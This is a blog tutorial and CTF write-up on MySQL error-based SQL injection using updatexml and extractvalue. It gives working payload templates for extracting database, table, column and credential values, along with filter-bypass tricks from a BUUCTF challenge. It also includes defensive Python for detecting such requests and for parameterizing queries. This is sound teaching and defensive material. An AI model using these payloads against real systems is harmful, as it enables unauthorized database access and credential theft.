SQL error injection

Error-based injection uses certain mechanisms of the database to deliberately trigger an error condition so that the query result is carried back inside the error message.

XPath syntax error (with a length limitation)

extractvalue queries the content of a node in an XML document according to XPath syntax, and updatexml modifies the content it finds:

updatexml

Function prototype: updatexml(xml_document, xpath_string, new_value)
First parameter: xml_document, a string, the name of the XML document object.
Second parameter: xpath_string, a string in XPath format.
Third parameter: new_value, a string, which replaces the data found by the path condition.
Function: change the value of the node in the document that matches the condition.

The second parameter must conform to XPath syntax. If it does not, MySQL raises an error and places the offending string, which here is the query result, in the error message, so the result can be read from there.

Example: sqli-labs

Less-5?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)--+       (dump the database name)

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+       (dump table names)

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+       (dump column names)

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)--+       (dump data)

PS: updatexml shows at most 32 characters of the error string, so the output is limited; anything beyond 32 characters is not displayed.

To sum up:

Dump the database name: 'and(select updatexml(1,concat(0x7e,(select database())),0x7e))

Dump table names: 'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))

Dump column names: 'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))

Dump data: 'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

extractvalue function

Function prototype: extractvalue(xml_document, xpath_string)
First parameter: xml_document, a string, the name of the XML document object.
Second parameter: xpath_string, a string in XPath format.
Function: returns a string containing the value found in the target XML.

Query the database name: id='and(select extractvalue(1,concat(0x7e,(select database()))))

Dump table names: id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

Dump field names: id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

Dump data: id='and(select extractvalue(1,concat(0x7e,(select group_concat(COLUMN_NAME) from TABLE_NAME))))
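From the defender's side, the updatexml and extractvalue payloads above, and the 32-character error message they rely on, are easy to recognize in two places: the request (a call to one of the two functions wrapped around concat with a 0x7e or '~' delimiter) and the response (a MySQL "XPATH syntax error" echoed to the client). The following Python is an added example, not code from the original post; the log lines and response bodies are constructed, the combined-log format is an assumption, and the signature is derived from the payload shapes on this page rather than from any vendor ruleset.

```python
"""Detect error-based (XPath) SQL injection attempts in web logs and responses.

Added defensive example; not code from the original post. The log lines and
response bodies are constructed for this demo, the combined-log format is an
assumption, and the signature (updatexml/extractvalue wrapped around concat
with a 0x7e or '~' delimiter) is derived from the payload shapes shown above.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined-log style, assumed format).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Dec/2020:10:07:18 +0000] "GET /Less-5/?id=1'%20or%20updatexml(1,concat(0x7e,database(),0x7e),1)--+ HTTP/1.1" 200 1412
10.0.0.5 - - [21/Dec/2020:10:07:19 +0000] "GET /login.php?username=admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21 HTTP/1.1" 200 1312
10.0.0.5 - - [21/Dec/2020:10:07:20 +0000] "GET /login.php?username=admin'or(extractvalue(1,concat('~',(select(password)from(H4rDsq1)))))%23&password=x HTTP/1.1" 200 980
10.0.0.7 - - [21/Dec/2020:10:08:01 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 1400
10.0.0.8 - - [21/Dec/2020:10:08:02 +0000] "GET /search?q=how+to+use+updatexml+in+mysql HTTP/1.1" 200 5000
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d+)')

# updatexml( or extractvalue( followed, within the same statement, by concat(.
XPATH_FUNC_RE = re.compile(r"\b(updatexml|extractvalue)\s*\([^;]*?\bconcat\s*\(", re.I)
# The 0x7e / '~' delimiter that makes the concatenated result an invalid XPath.
DELIM_RE = re.compile("0x7e|['\"]~['\"]", re.I)
# MySQL puts the offending XPath string (at most 32 characters) into the message.
XPATH_ERR_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def normalize(url: str) -> str:
    """URL-decode repeatedly (double encoding), strip inline comments and
    collapse whitespace so parenthesis-only payloads and spaced ones look alike."""
    decoded = url
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = re.sub(r"/\*.*?\*/", "", decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def detect_xpath_error_injection(url: str) -> Optional[Tuple[str, str]]:
    """Return (function_name, confidence) for a request that looks like an
    error-based XPath injection attempt, or None for a clean request."""
    text = normalize(url)
    m = XPATH_FUNC_RE.search(text)
    if not m:
        return None
    # concat() inside updatexml/extractvalue is already suspicious; the
    # delimiter only raises confidence, since any non-XPath character works.
    confidence = "high" if DELIM_RE.search(text) else "medium"
    return m.group(1), confidence


def scan_log(log_text: str) -> List[Tuple[str, str, str, str]]:
    """Return (client_ip, path, function, confidence) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, url, _status = m.groups()
        verdict = detect_xpath_error_injection(url)
        if verdict:
            hits.append((ip, url.split("?", 1)[0], verdict[0], verdict[1]))
    return hits


def leaked_from_xpath_error(body: str) -> Optional[str]:
    """If a response body echoes MySQL's XPath error, return the leaked string.
    Any hit means query results reach the client; the fix is a generic error
    page with the real DB error kept in server-side logs."""
    m = XPATH_ERR_RE.search(body)
    return m.group(1) if m else None


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious request:", hit)
    print("leaked:", leaked_from_xpath_error("XPATH syntax error: '~geek~'"))
```

The response-side check is the more reliable of the two: a request signature can be evaded with other functions, but a database error string in an HTTP body is always a defect worth an alert.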

BUUCTF-[Geek Challenge 2019] HardSQL (error injection)

1. After fuzzing with Burp, union, order by, the equals sign, spaces, substr and so on are filtered; that is the rough picture.

2. Dump the current database name.
Space bypass: wrap expressions in parentheses () instead of using spaces.

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21

-> Database name: geek

3. Dump the table name.
Equals-sign bypass: replace = with like.

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=21

-> Table name: H4rDsq1

4. Dump the field names.

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=21

-> Fields: id,username,password

5. Dump the password.

'or(extractvalue(1,concat('~',(select(password)from(H4rDsq1)))))#

-> flag{9f09946d-4c83-40f5-982

The whole value is not shown because of the 32-character limit, so we have to use MySQL string functions such as substr, left or right.
Note: substr is filtered.

admin'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=21

Result: XPATH syntax error: '3-40f5-9828-9593ee5f3f4c}'

Splicing the two pieces together gives:
flag{9f09946d-4c83-40f5-9828-9593ee5f3f4c}
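The challenge above works only because the login handler pastes the username into the SQL text and prints the database error back to the browser. The following Python is an added example, not code from the original post or from the challenge: it shows the vulnerable string-built query beside the parameterized fix, and a handler that logs the database error instead of echoing it. SQLite's in-memory engine stands in for MySQL so it runs offline (an assumption; SQLite has no updatexml(), so the injected call fails for a different reason than in MySQL, but in both engines the attacker's text reaches the SQL parser in the vulnerable version and stays a plain string value in the parameterized one).

```python
"""Vulnerable string-built login query beside the parameterized fix.

Added defensive example; not code from the original post or the CTF challenge.
SQLite's in-memory engine stands in for MySQL (assumption made so the demo runs
offline). The users table below is constructed with the id,username,password
columns named in the walkthrough.
"""
import logging
import sqlite3

log = logging.getLogger("login")

# Payload shape from the walkthrough above, URL-decoded (%23 -> '#').
PAYLOAD = "admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'secret')")
    return conn


def build_query_vulnerable(username: str, password: str) -> str:
    """The defect: untrusted input is pasted straight into the SQL text."""
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def injected_text_reaches_engine(conn, username: str, password: str) -> bool:
    """True if the concatenated query makes the SQL engine fail, i.e. the
    input was parsed as SQL rather than treated as data."""
    try:
        conn.execute(build_query_vulnerable(username, password)).fetchone()
        return False
    except sqlite3.Error:
        return True


def login(conn, username: str, password: str, use_params: bool) -> str:
    """Return the message shown to the client. With use_params=True the input
    is bound as a parameter; either way the DB error is logged, never echoed."""
    try:
        if use_params:
            cur = conn.execute(
                "SELECT username FROM users WHERE username=? AND password=?",
                (username, password))
        else:
            cur = conn.execute(build_query_vulnerable(username, password))
        row = cur.fetchone()
    except sqlite3.Error as exc:
        # This exception text is exactly what error-based injection harvests
        # when an application prints it; keep it server-side.
        log.warning("database error during login for %r: %s", username, exc)
        return "Login failed"
    return "Welcome %s" % row[0] if row else "Login failed"


if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable(PAYLOAD, "21"))
    print("vulnerable handler:", login(db, PAYLOAD, "21", use_params=False))
    print("parameterized handler:", login(db, PAYLOAD, "21", use_params=True))
```

Parameter binding removes the injection; the generic error message is the second, independent layer that would have denied the walkthrough its output channel even if the query had stayed vulnerable.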

Origin blog.csdn.net/weixin_49298265/article/details/111505198